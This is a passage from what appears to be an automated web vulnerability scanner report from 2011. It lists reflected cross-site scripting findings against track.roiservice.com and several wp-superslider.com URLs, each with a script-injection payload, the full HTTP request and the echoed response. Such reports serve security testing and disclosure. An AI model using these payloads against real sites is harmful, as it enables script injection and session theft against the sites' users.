...[SNIP]...

1.175. http://track.roiservice.com/track/track.aspx [ROIID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.roiservice.com
Path:   /track/track.aspx

Issue detail

The value of the ROIID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d61'%3balert(1)//83d5529551f was submitted in the ROIID parameter. This input was echoed as e5d61';alert(1)//83d5529551f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /track/track.aspx?ROIID=936138107000019e5d61'%3balert(1)//83d5529551f HTTP/1.1
Host: track.roiservice.com
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: msid938956107000029=06dd214c75b14fd39004a5e41502868d

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: msid936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; expires=Sun, 02-Feb-2031 15:42:42 GMT; path=/
Set-Cookie: GTT936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; path=/
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 1656

var ROIID='936138107000019e5d61';alert(1)//83d5529551f';var sn = 'ddc990c0fc744d2cbe0ff4ded6312952';var dm=null;var gt_url = '';var gt_cid= '';var xDate=new Date();xDate.setFullYear(xDate.getFullYear() + 1);function au(nm, vl){gt_url+='&' + nm + '=' + esc
...[SNIP]...

1.176. http://wp-superslider.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce46"><script>alert(1)</script>2b12960bb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ce46\"><script>alert(1)</script>2b12960bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ce46"><script>alert(1)</script>2b12960bb2=1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 406 Not Acceptable
Date: Wed, 02 Feb 2011 15:42:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Set-Cookie: bb2_screener_=1296661378+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296661378; expires=Thu, 02-Feb-2012 15:42:58 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="redirect_to" value="/?2ce46\"><script>alert(1)</script>2b12960bb2=1" />
...[SNIP]...

1.177. http://wp-superslider.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1c7"><script>alert(1)</script>59b95746b00 was submitted in the REST URL parameter 1. This input was echoed as ba1c7\"><script>alert(1)</script>59b95746b00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.phpba1c7"><script>alert(1)</script>59b95746b00 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674627+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674628; expires=Thu, 02-Feb-2012 19:23:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/index.phpba1c7\"><script>alert(1)</script>59b95746b00" />
...[SNIP]...

1.178. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427c3"><script>alert(1)</script>6ae2ba26414 was submitted in the REST URL parameter 1. This input was echoed as 427c3\"><script>alert(1)</script>6ae2ba26414 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site427c3"><script>alert(1)</script>6ae2ba26414/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site427c3\"><script>alert(1)</script>6ae2ba26414/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js" />
...[SNIP]...

1.179. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5400"><script>alert(1)</script>18ede8274ac was submitted in the REST URL parameter 2. This input was echoed as b5400\"><script>alert(1)</script>18ede8274ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentb5400"><script>alert(1)</script>18ede8274ac/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentb5400\"><script>alert(1)</script>18ede8274ac/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js" />
...[SNIP]...

1.180. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29535"><script>alert(1)</script>bb1a33e1d72 was submitted in the REST URL parameter 3. This input was echoed as 29535\"><script>alert(1)</script>bb1a33e1d72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins29535"><script>alert(1)</script>bb1a33e1d72/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins29535\"><script>alert(1)</script>bb1a33e1d72/si-contact-form/captcha-secureimage/ctf_captcha.js" />
...[SNIP]...

1.181. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc9c"><script>alert(1)</script>406f3f1b80a was submitted in the REST URL parameter 4. This input was echoed as fcc9c\"><script>alert(1)</script>406f3f1b80a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/si-contact-formfcc9c"><script>alert(1)</script>406f3f1b80a/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/si-contact-formfcc9c\"><script>alert(1)</script>406f3f1b80a/captcha-secureimage/ctf_captcha.js" />
...[SNIP]...

1.182. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21998"><script>alert(1)</script>61808997102 was submitted in the REST URL parameter 5. This input was echoed as 21998\"><script>alert(1)</script>61808997102 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/si-contact-form/captcha-secureimage21998"><script>alert(1)</script>61808997102/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/si-contact-form/captcha-secureimage21998\"><script>alert(1)</script>61808997102/ctf_captcha.js" />
...[SNIP]...

1.183. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be147"><script>alert(1)</script>60a126f5ab0 was submitted in the REST URL parameter 6. This input was echoed as be147\"><script>alert(1)</script>60a126f5ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.jsbe147"><script>alert(1)</script>60a126f5ab0 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.jsbe147\"><script>alert(1)</script>60a126f5ab0" />
...[SNIP]...

1.184. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82727"><script>alert(1)</script>61afe33f333 was submitted in the REST URL parameter 1. This input was echoed as 82727\"><script>alert(1)</script>61afe33f333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site82727"><script>alert(1)</script>61afe33f333/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site82727\"><script>alert(1)</script>61afe33f333/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

1.185. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8345f"><script>alert(1)</script>a5d18f0e20a was submitted in the REST URL parameter 2. This input was echoed as 8345f\"><script>alert(1)</script>a5d18f0e20a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content8345f"><script>alert(1)</script>a5d18f0e20a/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content8345f\"><script>alert(1)</script>a5d18f0e20a/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

1.186. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b6e4"><script>alert(1)</script>1a8376b51b was submitted in the REST URL parameter 3. This input was echoed as 2b6e4\"><script>alert(1)</script>1a8376b51b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins2b6e4"><script>alert(1)</script>1a8376b51b/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins2b6e4\"><script>alert(1)</script>1a8376b51b/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

1.187. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
